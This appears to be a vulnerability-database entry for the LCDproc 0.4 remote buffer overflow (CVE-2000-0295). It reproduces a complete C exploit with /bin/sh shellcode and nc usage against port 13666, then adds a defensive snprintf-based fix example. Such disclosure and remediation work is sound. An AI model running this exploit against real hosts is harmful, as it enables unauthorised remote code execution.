Multiple Vendors' Linux LCDProc Buffer Overflow Vulnerability

Vulnerability ID: 1105796    Vulnerability type: Buffer overflow
Published: 2000-04-23    Updated: 2005-10-20
CVE ID: CVE-2000-0295
CNNVD ID: CNNVD-200004-059
Platform: Linux    CVSS score: 10.0
|Sources
https://www.exploit-db.com/exploits/19868
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200004-059
|Details
A buffer overflow in LCDproc lets a remote attacker run arbitrary code with the privileges of the server process by sending an oversized argument to the screen_add command; the CVE entry describes this as gaining root, which holds when the server runs as root.
|Exploit
source: http://www.securityfocus.com/bid/1131/info

A vulnerability exists in the server portion of version 0.4 of the LCDProc package. Several remote buffer overflows exist that could allow a remote attacker to corrupt memory and execute arbitrary code. As listed in the Bugtraq posting revealing this vulnerability, the overflows are unbounded sprintf() calls that copy client-supplied strings into fixed-size buffers:

parse.c:149: sprintf(errmsg, "huh? Invalid command \"%s\"\n", argv[0]);
screenlist.c:119: sprintf(str, "ignore %s\n", old_s->id);
screenlist.c:134: sprintf(str, "listen %s\n", s->id);

It is possible to exploit these conditions to execute code with the privileges of the user LCDProc is running as.

/*****
 * lcdproc-exploit.c
 *****
 *
 * LCDproc 0.4-pre9 exploit
 # 
 # Andrew Hobgood <[email protected]>
 * Kha0S on #LinuxOS/EFnet
 * 
 * Tested on Linux/x86 2.2.5-15smp (the only Intel box I could get my hands
 * on for testing).
 * 
 *****
 */
   
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>

#define BUFFERSIZE 269          /* total payload length sent inside screen_add { } */
#define NOP 0x90
#define OFFSET 0xbffff750       /* guessed stack address the return address is aimed at */
 
/* Classic Linux/x86 execve("/bin/sh") shellcode (jmp/call trick to find the string) */
char shellcode[] =
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89"
        "\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
        "\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff"
        "\xff\xff/bin/sh";
   
int main(int argc, char **argv) {
        char *ptr, buffer[BUFFERSIZE];
        unsigned long *long_ptr, offset = OFFSET;
        int aux;
   
        fprintf(stderr, "LCDproc exploit by Andrew Hobgood <[email protected]>\n\n");
        fprintf(stderr, "Usage: (%s [<offset>]; cat) | nc <target> 13666\n\n", argv[0]);

        if (argc == 2) offset += atol(argv[1]);

        /* Payload layout: NOP sled | shellcode | 4 x return address | NUL */
        ptr = buffer;
        memset(ptr, 0, sizeof(buffer));
        memset(ptr, NOP, sizeof(buffer) - strlen(shellcode) - 16);
        ptr += sizeof(buffer) - strlen(shellcode) - 16;
        memcpy(ptr, shellcode, strlen(shellcode));
        ptr += strlen(shellcode);
        long_ptr = (unsigned long *) ptr;
        for(aux=0; aux<4; aux++) *(long_ptr++) = offset;  
        ptr = (char *) long_ptr;
        *ptr = '\0';
   
        fprintf(stderr, "Buffer size: %d\n", (int) strlen(buffer));
        fprintf(stderr, "Offset: 0x%lx\n\n", offset);
        
        /* Protocol: "hello" handshake first, then screen_add with the oversized id */
        printf("hello\n");
        fflush(stdout);
        sleep(1);
        printf("screen_add {%s}\n", buffer);
        fflush(stdout);
        
        return(0);
}       
/*** end lcdproc-exploit.c ***/
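The three sprintf() calls cited in the advisory all format a client-controlled string into a fixed-size buffer with no length check, which is why a screen_add id of the exploit's 269 bytes reaches the saved return address that the trailing four copies of OFFSET are aimed at. The C example below is added here and is neither LCDproc code nor part of the exploit: it measures how far the unbounded "listen %s\n" write would spill past an assumed 256-byte buffer (this page does not give LCDproc 0.4's real buffer sizes) and shows the bounded replacement a fix would use, with an assumed 64-byte id limit and a small parse_screen_id() helper for the brace syntax the exploit sends.

```c
/* Added example, not LCDproc or exploit code. STR_BUF, MAX_ID and
 * parse_screen_id() are assumptions for illustration only. */
#include <stdio.h>
#include <string.h>
#include <stddef.h>

#define STR_BUF     256   /* assumed size of the fixed buffer the sprintf writes into */
#define MAX_ID       64   /* assumed policy limit on a screen id */
#define HOSTILE_LEN 269   /* same length as BUFFERSIZE in the exploit above */

/* Bytes (including the NUL) that the original sprintf(str, "listen %s\n", id)
 * would emit. snprintf(NULL, 0, ...) only measures, so nothing is written. */
size_t unbounded_listen_len(const char *id) {
    int n = snprintf(NULL, 0, "listen %s\n", id);
    return n < 0 ? 0 : (size_t)n + 1;
}

/* How far past a STR_BUF-byte buffer the unbounded write would spill (0 = fits). */
size_t overflow_bytes(const char *id) {
    size_t need = unbounded_listen_len(id);
    return need > STR_BUF ? need - STR_BUF : 0;
}

/* Bounded replacement: reject oversized ids before formatting, then use snprintf
 * and check its return value instead of trusting the buffer to be big enough.
 * Returns 0 on success, -1 if the id is rejected or the output was truncated. */
int bounded_listen(char *out, size_t outlen, const char *id) {
    if (memchr(id, '\0', MAX_ID + 1) == NULL) return -1;   /* id longer than MAX_ID */
    int n = snprintf(out, outlen, "listen %s\n", id);
    if (n < 0 || (size_t)n >= outlen) {   /* truncated: never hand out partial output */
        if (outlen) out[0] = '\0';
        return -1;
    }
    return 0;
}

/* Pull the id out of a "screen_add {id}" line (the brace syntax the exploit sends)
 * into a caller-sized buffer; refuses anything that would not fit. */
int parse_screen_id(const char *line, char *id, size_t idlen) {
    const char *lb = strchr(line, '{');
    const char *rb = lb ? strchr(lb, '}') : NULL;
    if (lb == NULL || rb == NULL) return -1;
    size_t n = (size_t)(rb - lb - 1);
    if (n >= idlen) return -1;
    memcpy(id, lb + 1, n);
    id[n] = '\0';
    return 0;
}

/* Constructed hostile id: HOSTILE_LEN bytes of 'A', the length the exploit sends. */
const char *hostile_id(void) {
    static char id[HOSTILE_LEN + 1];
    memset(id, 'A', HOSTILE_LEN);
    id[HOSTILE_LEN] = '\0';
    return id;
}

/* Constructed hostile client line wrapping hostile_id() in the screen_add syntax. */
const char *hostile_line(void) {
    static char line[HOSTILE_LEN + 16];
    snprintf(line, sizeof line, "screen_add {%s}\n", hostile_id());
    return line;
}

/* Runs bounded_listen into a STR_BUF buffer; 1 if it produced exactly expected. */
int bounded_listen_yields(const char *id, const char *expected) {
    char out[STR_BUF];
    if (bounded_listen(out, sizeof out, id) != 0) return 0;
    return strcmp(out, expected) == 0;
}

/* Parses line into a MAX_ID+1 buffer; 1 if the id fits, 0 otherwise. */
int screen_id_accepted(const char *line) {
    char id[MAX_ID + 1];
    return parse_screen_id(line, id, sizeof id) == 0;
}

int main(void) {
    printf("unbounded write needs %zu bytes, overflows a %d-byte buffer by %zu\n",
           unbounded_listen_len(hostile_id()), STR_BUF, overflow_bytes(hostile_id()));
    printf("hostile screen_add line accepted: %d\n", screen_id_accepted(hostile_line()));
    printf("bounded format of hostile id succeeds: %d\n",
           bounded_listen_yields(hostile_id(), ""));
    printf("bounded format of \"main\" succeeds: %d\n",
           bounded_listen_yields("main", "listen main\n"));
    return 0;
}
```

The two checks in bounded_listen() are deliberately separate: the length limit rejects hostile input before any formatting happens, and the snprintf return-value check catches the case where a legitimate id plus the format prefix still does not fit the destination, which a bare snprintf would silently truncate.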
|References

Source: BUGTRAQ
Name: 20000420 Remote vulnerability in LCDproc 0.4
Link: http://www.securityfocus.com/templates/archive.pike?list=1&msg;[email protected]
Source: BID
Name: 1131
Link: http://www.securityfocus.com/bid/1131
Source: XF
Name: lcdproc-remote-overflow(4315)
Link: http://xforce.iss.net/xforce/xfdb/4315
Source: GENTOO
Name: GLSA-200301-07
Link: http://www.securityfocus.com/archive/1/archive/1/305589/30/26390/threaded
Source: SECUNIA
Name: 7829
Link: http://secunia.com/advisories/7829
